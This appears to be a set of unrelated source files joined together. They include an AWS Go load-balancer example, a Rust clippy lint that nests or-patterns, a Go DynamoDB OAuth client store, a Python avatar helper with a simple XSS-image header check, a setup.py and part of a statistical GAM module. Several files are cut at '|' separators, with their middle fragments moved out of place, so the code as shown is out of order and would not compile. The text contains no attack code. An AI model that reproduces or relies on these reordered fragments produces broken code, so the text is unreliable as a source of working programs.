input := &elbv2.ModifyTargetGroupInput{
HealthCheckPort: aws.String("443"),
HealthCheckProtocol: aws.String("HTTPS"),
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-https-targets/2453ed029918f21f"),
}
result, err := svc.ModifyTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
} |
unnested_or_patterns.rs | #![allow(clippy::wildcard_imports, clippy::enum_glob_use)]
use clippy_utils::ast_utils::{eq_field_pat, eq_id, eq_maybe_qself, eq_pat, eq_path};
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::{meets_msrv, msrvs, over};
use rustc_ast::mut_visit::*;
use rustc_ast::ptr::P;
use rustc_ast::{self as ast, Mutability, Pat, PatKind, PatKind::*, DUMMY_NODE_ID};
use rustc_ast_pretty::pprust;
use rustc_errors::Applicability;
use rustc_lint::{EarlyContext, EarlyLintPass};
use rustc_semver::RustcVersion;
use rustc_session::{declare_tool_lint, impl_lint_pass};
use rustc_span::DUMMY_SP;
use std::cell::Cell;
use std::mem;
declare_clippy_lint! {
/// ### What it does
/// Checks for unnested or-patterns, e.g., `Some(0) | Some(2)` and
/// suggests replacing the pattern with a nested one, `Some(0 | 2)`.
///
/// Another way to think of this is that it rewrites patterns in
/// *disjunctive normal form (DNF)* into *conjunctive normal form (CNF)*.
///
/// ### Why is this bad?
/// In the example above, `Some` is repeated, which unncessarily complicates the pattern.
///
/// ### Example
/// ```rust
/// fn main() {
/// if let Some(0) | Some(2) = Some(0) {}
/// }
/// ```
/// Use instead:
/// ```rust
/// fn main() {
/// if let Some(0 | 2) = Some(0) {}
/// }
/// ```
#[clippy::version = "1.46.0"]
pub UNNESTED_OR_PATTERNS,
pedantic,
"unnested or-patterns, e.g., `Foo(Bar) | Foo(Baz) instead of `Foo(Bar | Baz)`"
}
#[derive(Clone, Copy)]
pub struct UnnestedOrPatterns {
msrv: Option<RustcVersion>,
}
impl UnnestedOrPatterns {
#[must_use]
pub fn new(msrv: Option<RustcVersion>) -> Self {
Self { msrv }
}
}
impl_lint_pass!(UnnestedOrPatterns => [UNNESTED_OR_PATTERNS]);
impl EarlyLintPass for UnnestedOrPatterns {
fn check_arm(&mut self, cx: &EarlyContext<'_>, a: &ast::Arm) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &a.pat);
}
}
fn check_expr(&mut self, cx: &EarlyContext<'_>, e: &ast::Expr) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
if let ast::ExprKind::Let(pat, _, _) = &e.kind {
lint_unnested_or_patterns(cx, pat);
}
}
}
fn check_param(&mut self, cx: &EarlyContext<'_>, p: &ast::Param) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &p.pat);
}
}
fn check_local(&mut self, cx: &EarlyContext<'_>, l: &ast::Local) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &l.pat);
}
}
extract_msrv_attr!(EarlyContext);
}
fn lint_unnested_or_patterns(cx: &EarlyContext<'_>, pat: &Pat) {
if let Ident(.., None) | Lit(_) | Wild | Path(..) | Range(..) | Rest | MacCall(_) = pat.kind {
// This is a leaf pattern, so cloning is unprofitable.
return;
}
let mut pat = P(pat.clone());
// Nix all the paren patterns everywhere so that they aren't in our way.
remove_all_parens(&mut pat);
// Transform all unnested or-patterns into nested ones, and if there were none, quit.
if !unnest_or_patterns(&mut pat) {
return;
}
span_lint_and_then(cx, UNNESTED_OR_PATTERNS, pat.span, "unnested or-patterns", |db| {
insert_necessary_parens(&mut pat);
db.span_suggestion_verbose(
pat.span,
"nest the patterns",
pprust::pat_to_string(&pat),
Applicability::MachineApplicable,
);
});
}
/// Remove all `(p)` patterns in `pat`.
fn remove_all_parens(pat: &mut P<Pat>) {
struct Visitor;
impl MutVisitor for Visitor {
fn visit_pat(&mut self, pat: &mut P<Pat>) {
noop_visit_pat(pat, self);
let inner = match &mut pat.kind {
Paren(i) => mem::replace(&mut i.kind, Wild),
_ => return,
};
pat.kind = inner;
}
}
Visitor.visit_pat(pat);
}
/// Insert parens where necessary according to Rust's precedence rules for patterns.
fn insert_necessary_parens(pat: &mut P<Pat>) {
struct Visitor;
impl MutVisitor for Visitor {
fn visit_pat(&mut self, pat: &mut P<Pat>) {
use ast::{BindingMode::*, Mutability::*};
noop_visit_pat(pat, self);
let target = match &mut pat.kind {
// `i @ a | b`, `box a | b`, and `& mut? a | b`.
Ident(.., Some(p)) | Box(p) | Ref(p, _) if matches!(&p.kind, Or(ps) if ps.len() > 1) => p,
Ref(p, Not) if matches!(p.kind, Ident(ByValue(Mut), ..)) => p, // `&(mut x)`
_ => return,
};
target.kind = Paren(P(take_pat(target)));
}
}
Visitor.visit_pat(pat);
}
/// Unnest or-patterns `p0 | ... | p1` in the pattern `pat`.
/// For example, this would transform `Some(0) | FOO | Some(2)` into `Some(0 | 2) | FOO`.
fn unnest_or_patterns(pat: &mut P<Pat>) -> bool {
struct Visitor {
changed: bool,
}
impl MutVisitor for Visitor {
fn visit_pat(&mut self, p: &mut P<Pat>) {
// This is a bottom up transformation, so recurse first.
noop_visit_pat(p, self);
// Don't have an or-pattern? Just quit early on.
let alternatives = match &mut p.kind {
Or(ps) => ps,
_ => return,
};
// Collapse or-patterns directly nested in or-patterns.
let mut idx = 0;
let mut this_level_changed = false;
while idx < alternatives.len() {
let inner = if let Or(ps) = &mut alternatives[idx].kind {
mem::take(ps)
} else {
idx += 1;
continue;
};
this_level_changed = true;
alternatives.splice(idx..=idx, inner);
}
// Focus on `p_n` and then try to transform all `p_i` where `i > n`.
let mut focus_idx = 0;
while focus_idx < alternatives.len() {
this_level_changed |= transform_with_focus_on_idx(alternatives, focus_idx);
focus_idx += 1;
}
self.changed |= this_level_changed;
// Deal with `Some(Some(0)) | Some(Some(1))`.
if this_level_changed {
noop_visit_pat(p, self);
}
}
}
let mut visitor = Visitor { changed: false };
visitor.visit_pat(pat);
visitor.changed
}
/// Match `$scrutinee` against `$pat` and extract `$then` from it.
/// Panics if there is no match.
macro_rules! always_pat {
($scrutinee:expr, $pat:pat => $then:expr) => {
match $scrutinee {
$pat => $then,
_ => unreachable!(),
}
};
}
/// Focus on `focus_idx` in `alternatives`,
/// attempting to extend it with elements of the same constructor `C`
/// in `alternatives[focus_idx + 1..]`.
fn transform_with_focus_on_idx(alternatives: &mut Vec<P<Pat>>, focus_idx: usize) -> bool {
// Extract the kind; we'll need to make some changes in it.
let mut focus_kind = mem::replace(&mut alternatives[focus_idx].kind, PatKind::Wild);
// We'll focus on `alternatives[focus_idx]`,
// so we're draining from `alternatives[focus_idx + 1..]`.
let start = focus_idx + 1;
// We're trying to find whatever kind (~"constructor") we found in `alternatives[start..]`.
let changed = match &mut focus_kind {
// These pattern forms are "leafs" and do not have sub-patterns.
// Therefore they are not some form of constructor `C`,
// with which a pattern `C(p_0)` may be formed,
// which we would want to join with other `C(p_j)`s.
Ident(.., None) | Lit(_) | Wild | Path(..) | Range(..) | Rest | MacCall(_)
// Skip immutable refs, as grouping them saves few characters,
// and almost always requires adding parens (increasing noisiness).
// In the case of only two patterns, replacement adds net characters.
| Ref(_, Mutability::Not)
// Dealt with elsewhere.
| Or(_) | Paren(_) => false,
// Transform `box x | ... | box y` into `box (x | y)`.
//
// The cases below until `Slice(...)` deal with *singleton* products.
// These patterns have the shape `C(p)`, and not e.g., `C(p0, ..., pn)`.
Box(target) => extend_with_matching(
target, start, alternatives,
|k| matches!(k, Box(_)),
|k| always_pat!(k, Box(p) => p),
),
// Transform `&mut x | ... | &mut y` into `&mut (x | y)`.
Ref(target, Mutability::Mut) => extend_with_matching(
target, start, alternatives,
|k| matches!(k, Ref(_, Mutability::Mut)),
|k| always_pat!(k, Ref(p, _) => p),
),
// Transform `b @ p0 | ... b @ p1` into `b @ (p0 | p1)`.
Ident(b1, i1, Some(target)) => extend_with_matching(
target, start, alternatives,
// Binding names must match.
|k| matches!(k, Ident(b2, i2, Some(_)) if b1 == b2 && eq_id(*i1, *i2)),
|k| always_pat!(k, Ident(_, _, Some(p)) => p),
),
// Transform `[pre, x, post] | ... | [pre, y, post]` into `[pre, x | y, post]`.
Slice(ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(k, Slice(ps2) if eq_pre_post(ps1, ps2, idx)),
|k| always_pat!(k, Slice(ps) => ps),
),
// Transform `(pre, x, post) | ... | (pre, y, post)` into `(pre, x | y, post)`.
Tuple(ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(k, Tuple(ps2) if eq_pre_post(ps1, ps2, idx)),
|k| always_pat!(k, Tuple(ps) => ps),
),
// Transform `S(pre, x, post) | ... | S(pre, y, post)` into `S(pre, x | y, post)`.
TupleStruct(qself1, path1, ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(
k,
TupleStruct(qself2, path2, ps2)
if eq_maybe_qself(qself1, qself2) && eq_path(path1, path2) && eq_pre_post(ps1, ps2, idx)
),
|k| always_pat!(k, TupleStruct(_, _, ps) => ps),
),
// Transform a record pattern `S { fp_0, ..., fp_n }`.
Struct(qself1, path1, fps1, rest1) => extend_with_struct_pat(qself1, path1, fps1, *rest1, start, alternatives),
};
alternatives[focus_idx].kind = focus_kind;
changed
}
/// Here we focusing on a record pattern `S { fp_0, ..., fp_n }`.
/// In particular, for a record pattern, the order in which the field patterns is irrelevant.
/// So when we fixate on some `ident_k: pat_k`, we try to find `ident_k` in the other pattern
/// and check that all `fp_i` where `i ∈ ((0...n) \ k)` between two patterns are equal.
fn extend_with_struct_pat(
qself1: &Option<ast::QSelf>,
path1: &ast::Path,
fps1: &mut [ast::PatField],
rest1: bool,
start: usize,
alternatives: &mut Vec<P<Pat>>,
) -> bool {
(0..fps1.len()).any(|idx| {
let pos_in_2 = Cell::new(None); // The element `k`.
let tail_or = drain_matching(
start,
alternatives,
|k| {
matches!(k, Struct(qself2, path2, fps2, rest2)
if rest1 == *rest2 // If one struct pattern has `..` so must the other.
&& eq_maybe_qself(qself1, qself2)
&& eq_path(path1, path2)
&& fps1.len() == fps2.len()
&& fps1.iter().enumerate().all(|(idx_1, fp1)| {
if idx_1 == idx {
// In the case of `k`, we merely require identical field names
// so that we will transform into `ident_k: p1_k | p2_k`.
let pos = fps2.iter().position(|fp2| eq_id(fp1.ident, fp2.ident));
pos_in_2.set(pos);
pos.is_some()
} else {
fps2.iter().any(|fp2| eq_field_pat(fp1, fp2))
}
}))
},
// Extract `p2_k`.
|k| always_pat!(k, Struct(_, _, mut fps, _) => fps.swap_remove(pos_in_2.take().unwrap()).pat),
);
extend_with_tail_or(&mut fps1[idx].pat, tail_or)
})
}
/// Like `extend_with_matching` but for products with > 1 factor, e.g., `C(p_0, ..., p_n)`.
/// Here, the idea is that we fixate on some `p_k` in `C`,
/// allowing it to vary between two `targets` and `ps2` (returned by `extract`),
/// while also requiring `ps1[..n] ~ ps2[..n]` (pre) and `ps1[n + 1..] ~ ps2[n + 1..]` (post),
/// where `~` denotes semantic equality.
fn ex | targets: &mut [P<Pat>],
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind, &[P<Pat>], usize) -> bool,
extract: impl Fn(PatKind) -> Vec<P<Pat>>,
) -> bool {
(0..targets.len()).any(|idx| {
let tail_or = drain_matching(
start,
alternatives,
|k| predicate(k, targets, idx),
|k| extract(k).swap_remove(idx),
);
extend_with_tail_or(&mut targets[idx], tail_or)
})
}
/// Extract the pattern from the given one and replace it with `Wild`.
/// This is meant for temporarily swapping out the pattern for manipulation.
fn take_pat(from: &mut Pat) -> Pat {
let dummy = Pat {
id: DUMMY_NODE_ID,
kind: Wild,
span: DUMMY_SP,
tokens: None,
};
mem::replace(from, dummy)
}
/// Extend `target` as an or-pattern with the alternatives
/// in `tail_or` if there are any and return if there were.
fn extend_with_tail_or(target: &mut Pat, tail_or: Vec<P<Pat>>) -> bool {
fn extend(target: &mut Pat, mut tail_or: Vec<P<Pat>>) {
match target {
// On an existing or-pattern in the target, append to it.
Pat { kind: Or(ps), .. } => ps.append(&mut tail_or),
// Otherwise convert the target to an or-pattern.
target => {
let mut init_or = vec![P(take_pat(target))];
init_or.append(&mut tail_or);
target.kind = Or(init_or);
},
}
}
let changed = !tail_or.is_empty();
if changed {
// Extend the target.
extend(target, tail_or);
}
changed
}
// Extract all inner patterns in `alternatives` matching our `predicate`.
// Only elements beginning with `start` are considered for extraction.
fn drain_matching(
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind) -> bool,
extract: impl Fn(PatKind) -> P<Pat>,
) -> Vec<P<Pat>> {
let mut tail_or = vec![];
let mut idx = 0;
for pat in alternatives.drain_filter(|p| {
// Check if we should extract, but only if `idx >= start`.
idx += 1;
idx > start && predicate(&p.kind)
}) {
tail_or.push(extract(pat.into_inner().kind));
}
tail_or
}
fn extend_with_matching(
target: &mut Pat,
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind) -> bool,
extract: impl Fn(PatKind) -> P<Pat>,
) -> bool {
extend_with_tail_or(target, drain_matching(start, alternatives, predicate, extract))
}
/// Are the patterns in `ps1` and `ps2` equal save for `ps1[idx]` compared to `ps2[idx]`?
fn eq_pre_post(ps1: &[P<Pat>], ps2: &[P<Pat>], idx: usize) -> bool {
ps1.len() == ps2.len()
&& ps1[idx].is_rest() == ps2[idx].is_rest() // Avoid `[x, ..] | [x, 0]` => `[x, .. | 0]`.
&& over(&ps1[..idx], &ps2[..idx], |l, r| eq_pat(l, r))
&& over(&ps1[idx + 1..], &ps2[idx + 1..], |l, r| eq_pat(l, r))
}
| tend_with_matching_product(
|
client.go | package dynamodb
import (
"errors"
"fmt"
"os"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/service/dynamodb"
"github.com/aws/aws-sdk-go/service/dynamodb/dynamodbattribute"
"gopkg.in/oauth2.v3"
"gopkg.in/oauth2.v3/models"
)
// ClientConfig client configuration parameters
type ClientConfig struct {
// store clients data collection name(The default is oauth2_clients)
ClientsCName string
}
// ClientStore DynamoDB storage for OAuth 2.0
type ClientStore struct {
ccfg *ClientConfig
dbName string
client *dynamodb.DynamoDB
}
// NewDefaultClientConfig create a default client configuration
func NewDefaultClientConfig() *ClientConfig {
return &ClientConfig{
ClientsCName: "oauth2_clients",
}
}
func initClientTable(client *dynamodb.DynamoDB, clientConfig *ClientConfig) (err error) {
// Create authorization code table
input := &dynamodb.CreateTableInput{
AttributeDefinitions: []*dynamodb.AttributeDefinition{
{
AttributeName: aws.String("ID"),
AttributeType: aws.String("S"),
},
},
KeySchema: []*dynamodb.KeySchemaElement{
{
AttributeName: aws.String("ID"),
KeyType: aws.String("HASH"),
},
},
ProvisionedThroughput: &dynamodb.ProvisionedThroughput{
ReadCapacityUnits: aws.Int64(10),
WriteCapacityUnits: aws.Int64(10),
},
TableName: &clientConfig.ClientsCName,
}
_, err = client.CreateTable(input)
if err != nil |
return
}
// NewClientStore create a client store instance based on dynamodb
func NewClientStore(client *dynamodb.DynamoDB, ccfg *ClientConfig) (store *ClientStore) {
initClientTable(client, ccfg)
store = &ClientStore{
ccfg: ccfg,
client: client,
}
return
}
// Set set client information
func (cs *ClientStore) Set(info oauth2.ClientInfo) (err error) {
params := &dynamodb.PutItemInput{
TableName: aws.String(cs.ccfg.ClientsCName),
Item: map[string]*dynamodb.AttributeValue{
"ID": &dynamodb.AttributeValue{
S: aws.String(info.GetID()),
},
"Secret": &dynamodb.AttributeValue{
S: aws.String(info.GetSecret()),
},
"Domain": &dynamodb.AttributeValue{
S: aws.String(info.GetDomain()),
},
"UserID": &dynamodb.AttributeValue{
S: aws.String(info.GetUserID()),
},
},
ConditionExpression: aws.String("attribute_not_exists(ID)"),
}
_, err = cs.client.PutItem(params)
return
}
// GetByID according to the ID for the client information
func (cs *ClientStore) GetByID(id string) (info oauth2.ClientInfo, err error) {
input := &dynamodb.GetItemInput{
Key: map[string]*dynamodb.AttributeValue{
"ID": {
S: aws.String(id),
},
},
TableName: aws.String(cs.ccfg.ClientsCName),
}
result, err := cs.client.GetItem(input)
if len(result.Item) == 0 {
err = errors.New("no such client id")
return
}
var infoC models.Client
err = dynamodbattribute.UnmarshalMap(result.Item, &infoC)
info = &infoC
return
}
// RemoveByID use the client id to delete the client information
func (cs *ClientStore) RemoveByID(id string) (err error) {
input := &dynamodb.DeleteItemInput{
Key: map[string]*dynamodb.AttributeValue{
"ID": {
S: aws.String(id),
},
},
TableName: aws.String(cs.ccfg.ClientsCName),
ConditionExpression: aws.String("attribute_exists(ID)"),
}
_, err = cs.client.DeleteItem(input)
return
}
| {
if awsErr, ok := err.(awserr.Error); ok {
switch awsErr.Code() {
case dynamodb.ErrCodeResourceInUseException:
break
default:
fmt.Println("Got error calling CreateTable for clients:")
fmt.Println(awsErr.Error())
os.Exit(1)
}
}
} |
XSSImageCheck.py | # -*- coding: utf-8 -*-
"""
@author: moloch
Copyright 2014
--------------------------------------------
Check for ticksy .gif and .bmp files
http://jklmnn.de/imagejs/
"""
import os
from string import printable
from tornado.options import options
from random import randint
MAX_AVATAR_SIZE = 1024 * 1024
MIN_AVATAR_SIZE = 64
IMG_FORMATS = ["png", "jpeg", "jpg", "gif", "bmp"]
def is_xss_image(data):
return all([char in printable for char in data[:16]])
def get_new_avatar(dir, forceteam=False): | if len(avatars) == 0:
return avatar
if dir == "team" or forceteam:
from models.Team import Team
cmplist = Team.all()
elif dir == "user":
from models.User import User
cmplist = User.all()
else:
from models.Box import Box
cmplist = Box.all()
dblist = []
for item in cmplist:
if item._avatar:
dblist.append(item._avatar)
for image in avatars:
if not image in dblist:
return image
return avatars[randint(0, len(avatars) - 1)]
def default_avatar(dir):
if dir == "team":
avatar = "default_team.jpg"
elif dir == "user":
avatar = "default_user.jpg"
else:
avatar = "default_box.jpg"
return avatar
def filter_avatars(dir):
avatars = os.listdir(options.avatar_dir + "/" + dir)
avatarlist = []
for avatar in avatars:
if avatar.lower().endswith(tuple(IMG_FORMATS)):
avatarlist.append(dir + "/" + avatar)
return avatarlist
def existing_avatars(dir):
avatars = []
if dir == "team":
from models.Team import Team
teams = Team.all()
for team in teams:
if team.avatar is not None and len(team.members) > 0:
avatars.append(team.avatar)
else:
from models.User import User
users = User.all()
for user in users:
if user.avatar is not None:
avatars.append(user.avatar)
return avatars | avatar = default_avatar(dir)
avatars = filter_avatars(dir) |
setup.py | from distutils.core import setup
DESC='A simple, extensible chatbot for Matrix'
setup(
name='python-matrix-gfyrslf', | author='Matt Stroud',
author_email='see github',
url='https://github.com/mstroud/python-matrix-gfyrslf',
packages=['python-matrix-gfyrslf'],
install_requires=['matrix_client'],
license='MIT',
summary=DESC,
long_description=DESC,
) | version='0.1', |
gamdist.py | # Copyright 2017 Match Group, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Passing untrusted user input may have unintended consequences. Not
# designed to consume input from unknown sources (i.e., the public
# internet).
#
# This file has been modified from the original release by Match Group
# LLC. A description of changes may be found in the change log
# accompanying this source code.
import sys
import pickle
import multiprocessing as mp
import numpy as np
import scipy.special as special
import scipy.stats as stats
import scipy.linalg as linalg
from matplotlib import pyplot as plt
from .feature import _Feature
from .categorical_feature import _CategoricalFeature
from .linear_feature import _LinearFeature
from .spline_feature import _SplineFeature
import proximal_operators as po
# To do:
# - Hierarchical models
# - Piecewise constant fits, total variation regularization
# - Monotone constraint
# - Implement overdispersion for Poisson family
# - Implement Multinomial, Proportional Hazards
# - Implement outlier detection
# - AICc, BIC, R-squared estimate
# - Confidence intervals on mu, predictions (probably need to use Bootstrap but can
# do so intelligently)
# - Confidence intervals on model parameters, p-values
# - Group lasso penalty (l2 norm -- not squared -- or l_\infty norm on f_j(x_j; p_j))
# - Interactions
# - Runtime optimization (Cython)
# - Fit in parallel
# - Residuals
# - Compute different types of residuals (Sec 3.1.7 of [GAMr])
# - Plot residuals against mean response, variance, predictor, unused predictor
# - QQ plot of residuals
#
# Done:
# - Implement Gaussian, Binomial, Poisson, Gamma, Inv Gaussian,
# - Plot splines
# - Deviance (on training set and test set), AIC, Dispersion, GCV, UBRE
# - Write documentation
# - Check implementation of Gamma dispersion
# - Implement probit, complementary log-log links.
# - Implement Binomial models for covariate classes
# - Constrain spline to have mean prediction 0 over the data
# - Save and load properly
# - Implement overdispersion for Binomial family
FAMILIES = ['normal',
'binomial',
'poisson',
'gamma',
'exponential',
'inverse_gaussian'
]
LINKS = ['identity',
'logistic',
'probit',
'complementary_log_log',
'log',
'reciprocal',
'reciprocal_squared'
]
FAMILIES_WITH_KNOWN_DISPERSIONS = {'binomial': 1,
'poisson': 1
}
CANONICAL_LINKS = {'normal': 'identity',
'binomial': 'logistic',
'poisson': 'log',
'gamma': 'reciprocal',
'inverse_gaussian': 'reciprocal_squared'
}
# Non-canonical but common link/family combinations include:
# Binomial: probit and complementary log-log
# Gamma: identity and log
def _plot_convergence(prim_res, prim_tol, dual_res, dual_tol, dev):
"""Plot convergence progress.
We deem the algorithm to have converged when the prime and dual
residuals are smaller than tolerances which are themselves computed
based on the data as in [ADMM]. Some analysts prefer to claim
convergence when changes to the deviance (a measure of goodness of
fit). Thus we plot that as well. Specifically, we plot, on a log
scale, dev - dev_final, where dev_final is the deviance of the final
model. We add 1e-10 just to avoid taking the logarithm of zero, which
is completely arbitrary but makes the plot look acceptable.
Parameters
----------
prim_res : array
Array of prime residuals after each iteration.
prim_tol : array
Array of prime tolerances after each iteration.
dual_res : array
Array of dual residuals after each iteration.
dual_tol : array
Array of dual tolerances after each iteration.
dev : array
Array of deviances after each iteration
Returns
-------
(nothing)
"""
fig = plt.figure(figsize=(12., 10.))
ax = fig.add_subplot(211)
ax.plot(range(len(prim_res)), prim_res, 'b-', label='Primal Residual')
ax.plot(range(len(prim_tol)), prim_tol, 'b--', label='Primal Tolerance')
ax.plot(range(len(dual_res)), dual_res, 'r-', label='Dual Residual')
ax.plot(range(len(dual_tol)), dual_tol, 'r--', label='Dual Tolerance')
ax.set_yscale('log')
plt.xlabel('Iteration', fontsize=24)
plt.ylabel('Residual', fontsize=24)
plt.legend(fontsize=24, loc=3)
ax = fig.add_subplot(212)
ax.plot(range(len(dev)), (dev - dev[-1]) + 1e-10, 'b-', label='Deviance')
ax.set_yscale('log')
plt.xlabel('Iteration', fontsize=24)
plt.ylabel('Deviance Suboptimality', fontsize=24)
plt.gcf().subplots_adjust(bottom=0.1)
plt.gcf().subplots_adjust(left=0.1)
plt.show()
def _feature_wrapper(f):
"""Wrapper for feature optimization.
This is a wrapper for use with multi-threaded versions.
Unfortunately Python threads are *terrible*, so this doesn't
actually get used.
Parameters
------
f : list
Array of inputs. f[0] is the name of the feature. f[1]
is the feature object itself. f[2] is N * fpumz (the
vector input to the feature during optimization). f[3]
is the ADMM parameter, rho.
Returns
-------
name : str
The name of the feature. (The same as the input.)
f_j : array
The array of fitted values returned by the feature.
"""
return f[0], f[1].optimize(f[2], f[3])
def _gamma_dispersion(dof, dev, num_obs):
"""Gamma dispersion.
This function estimates the dispersion of a Gamma family with p
degrees of freedom and deviance D, and n observations. The
dispersion nu is that number satisfying
2*n * (log nu - psi(nu)) - p / nu = D
We use Newton's method with a learning rate to solve this nonlinear
equation.
Parameters
----------
dof : float
Degrees of freedom
dev : float
Deviance
num_obs : int
Number of observations
Returns
-------
nu : float
Estimated dispersion
"""
beta = 0.1
tol = 1e-6
max_its = 100
nu = 1.
for i in range(max_its):
num = 2. * num_obs * (np.log(nu) - special.psi(nu)) - dof / nu - dev
denom = 2. * num_obs * (1. / nu - special.polygamma(1, nu)) + dof / (nu * nu)
dnu = num / denom
nu -= dnu * beta
if abs(dnu) < tol:
return nu
else:
raise ValueError('Could not estimate gamma dispersion.')
class GAM:
def __init__(self, family=None, link=None, dispersion=None,
estimate_overdispersion=False, name=None,
load_from_file=None):
"""Generalized Additive Model
This is the constructor for a Generalized Additive Model.
References
----------
[glmnet] glmnet (R package):
https://cran.r-project.org/web/packages/glmnet/index.html
This is the standard package for GAMs in R and was written by people
much smarter than I am!
[pygam] pygam (Python package): https://github.com/dswah/pyGAM
This is a library in Python that does basically the same thing as this
script, but in a different way (not using ADMM).
[GLM] Generalized Linear Models by McCullagh and Nelder
The standard text on GLMs.
[GAM] Generalized Additive Models; by Hastie and Tibshirani
The book by the folks who invented GAMs.
[ESL] The Elements of Statistical Learning; by Hastie, Tibshirani, and
Friedman. Covers a lot more than just GAMs.
[GAMr] Generalized Additive Models: an Introduction with R; by Wood.
Covers more implementation details than [GAM].
[ADMM] Distributed Optimization and Statistical Learning via the Alternating
Direction Method of Multipliers; by Boyd, Parikh, Chu, Peleato, and
Eckstein. A mouthful, a work of genius.
[GAMADMM] A Distributed Algorithm for Fitting Generalized Additive Models;
by Chu, Keshavarz, and Boyd
Forms the basis of our approach, the inspiration for this package!
Parameters
----------
family : str or None (default None)
Family of the model. Currently supported families include:
'normal' (for continuous responses),
'binomial' (for binary responses),
'poisson' (for counts),
'gamma' (still in progress),
'inverse_gaussian' (still in progress).
Not currently supported families that could be supported
include Multinomial models (ordinal and nominal) and
proportional hazards models. Required unless loading an
existing model from file (see load_from_file).
link : str or None (optional)
Link function associated with the model. Supported link
functions include:
Link Canonical For Family
'identity' 'normal'
'logistic' 'binomial'
'log' 'poisson'
'reciprocal' 'gamma'
'reciprocal_squared' 'inverse_gaussian'
Other links worth supporting include probit, log-log
and complementary log-log link functions. If not
specified, the canonical link will be used, but non-
canonical links are still permitted. Certain link/family
combinations result in a non-convex problem and
convergence is not guaranteed.
dispersion : float or None (optional)
Dispersion parameter associated with the model. Certain
families (binomial, poisson) have dispersion independent
of the data. Specifying the dispersion for these families
does nothing. In other instances, the dispersion is
typically unknown and must be estimated from the data.
If the dispersion is known, it can be specified here which
will reduce the uncertainty of the model.
estimate_overdispersion : boolean (optional)
Flag specifying whether to estimate over-dispersion for
Binomial and Poisson (not yet implemented) families. Is
only possible when covariate classes are present and have
at least modest size. See [GLM, S4.5] for
details. Defaults to False.
name : str or None (optional)
Name for model, to be used in plots and in saving files.
load_from_file : str or None (optional)
This module uses an iterative approach to fitting models.
For complicated models with lots of data, each iteration
can take a long time (though the number of iterations is
typically less than 100). If the user wishes to pause
after the end of an iteration, they can pick up where
the left off by saving results (see the save_flag in .fit)
and loading them to start the next iterations. Specifying
this option supercedes all other parameters.
Returns
-------
mdl : Generalized Additive Model object
"""
if load_from_file is not None:
self._load(load_from_file)
return
if family is None:
raise ValueError('Family not specified.')
elif family not in FAMILIES:
raise ValueError('{} family not supported'.format(family))
elif family == 'exponential':
# Exponential is a special case of Gamma with a dispersion of 1.
self._family = 'gamma'
dispersion = 1.
else:
self._family = family
if link is None:
self._link = CANONICAL_LINKS[family]
elif link in LINKS:
self._link = link
else:
raise ValueError('{} link not supported'.format(link))
if dispersion is not None:
self._known_dispersion = True
self._dispersion = dispersion
elif (self._family in FAMILIES_WITH_KNOWN_DISPERSIONS.keys()
and not estimate_overdispersion):
self._known_dispersion = True
self._dispersion = FAMILIES_WITH_KNOWN_DISPERSIONS[self._family]
else:
self._known_dispersion = False
if self._link == 'identity':
self._eval_link = lambda x: x
self._eval_inv_link = lambda x: x
elif self._link == 'logistic':
self._eval_link = lambda x: np.log( x / (1. - x) )
self._eval_inv_link = lambda x: np.exp(x) / (1 + np.exp(x))
elif self._link == 'probit':
# Inverse CDF of the Gaussian distribution
self._eval_link = lambda x: stats.norm.ppf(x)
self._eval_inv_link = lambda x: stats.norm.cdf(x)
elif self._link == 'complementary_log_log':
self._eval_link = lambda x: np.log(-np.log(1. - x))
self._eval_inv_link = lambda x: 1. - np.exp(-np.exp(x))
elif self._link == 'log':
self._eval_link = lambda x: np.log(x)
self._eval_inv_link = lambda x: np.exp(x)
elif self._link == 'reciprocal':
self._eval_link = lambda x: 1. / x
self._eval_inv_link = lambda x: 1. / x
elif self._link == 'reciprocal_squared':
self._eval_link = lambda x: 1. / (x * x)
self._eval_inv_link = lambda x: 1. / np.sqrt(x)
self._estimate_overdispersion = estimate_overdispersion
self._features = {}
self._offset = 0.0
self._num_features = 0
self._fitted = False
self._name = name
def _save(self):
"""Save state.
Save the model to file to make predictions later, or continue
a fitting session.
"""
mv = {}
mv['family'] = self._family
mv['link'] = self._link
mv['known_dispersion'] = self._known_dispersion
if self._known_dispersion:
mv['dispersion'] = self._dispersion
mv['estimate_overdispersion'] = self._estimate_overdispersion
mv['offset'] = self._offset
mv['num_features'] = self._num_features
mv['fitted'] = self._fitted
mv['name'] = self._name
features = {}
for name, feature in self._features.iteritems():
features[name] = {'type': feature.__type__,
'filename': feature._filename
}
mv['features'] = features
# mv['rho'] = self._rho
